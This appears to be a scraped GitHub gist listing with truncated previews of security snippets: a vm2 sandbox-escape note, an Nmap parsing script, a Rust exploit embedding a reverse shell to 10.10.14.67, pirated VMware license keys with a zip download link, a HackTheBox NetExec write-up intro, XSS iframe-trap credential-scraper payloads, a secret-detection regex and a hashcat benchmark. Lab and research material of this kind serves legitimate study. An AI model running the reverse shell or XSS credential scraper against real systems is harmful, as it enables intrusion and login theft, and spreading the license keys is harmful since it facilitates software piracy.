In vm2 for versions up to 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Check if an argument was provided | |
if [ $# -eq 0 ]; then | |
NMAP_XML_OUTPUT="/dev/stdin" | |
else | |
NMAP_XML_OUTPUT="$1" | |
fi | |
# Use xmllint to parse IP addresses and ports from the Nmap XML output |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// I couldn't find the owner of the exploit, anyone who knows can comment so I can give the credits ;) | |
extern crate chrono; | |
use std::fs::OpenOptions; | |
use std::io::Write; | |
use chrono::prelude::*; | |
use std::process::Command; | |
pub fn log(user: &str, query: &str, justification: &str) { | |
let command = "bash -i >& /dev/tcp/10.10.14.67/444 0>&1"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Install VMWare Workstation PRO 17 (Read it right. PRO!) | |
Also, these keys might also work with VMWare Fusion 13 PRO. Just tested it. | |
Sub to me on youtube pls - PurpleVibe32 | |
if you want more keys - call my bot on telegram. @purector_bot (THE BOT WONT REPLY ANYMORE) - Or: https://cdn.discordapp.com/attachments/1040615179894935645/1074016373228978277/keys.zip - the password in the zip is 102me. | |
--- | |
This gist can get off at any time. | |
PLEASE, DONT COPY THIS. IF YOU FORK IT, DONT EDIT IT. | |
*If you have a problem comment and people will try to help you! | |
*No virus |
Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading Scrambled writeup from 0xdf_ when I read this:
smbclient won’t work, and I wasn’t able to get crackmapexec to work either.
To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with NXC, 5 minutes and you get root :)
Note: I will pass the web part where we get one username : ksimpson
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert('Click ok when you\'re ready to enter iframe trap'); | |
// Example Credential scraper and | |
// XSS iframe trap. Load from whatever | |
// page has the reflected/stored XSS vuln | |
// trap the user in an iframe of the app. | |
// Frame the login page, and copy out the | |
// username and password fields. | |
// @hoodoer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Apple M1 Ultra, 20 Core CPU, 48 Core GPU, 64GB of RAM, 1TB SSD | |
Thanks to @fhlipZero(https://twitter.com/fhlipZero) for running the benchmark on his hardware and allowing me to publish it. | |
A copy of both a short benchmark and the following full run can be found at https://gist.github.com/fhlip0 | |
hashcat (v6.2.5-340-g98b89e43d) starting in benchmark mode | |
Benchmarking uses hand-optimized kernel code by default. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert('Click ok when you\'re ready to enter iframe trap'); | |
// Example XSS iframe trap. Load from whatever | |
// page has the reflected/stored XSS vuln | |
// trap the user in an iframe of the app. | |
// While they surf around, they stick in your | |
// iFrame, and you keep their session and your XSS | |
// payload running. | |
// @hoodoer |
NewerOlder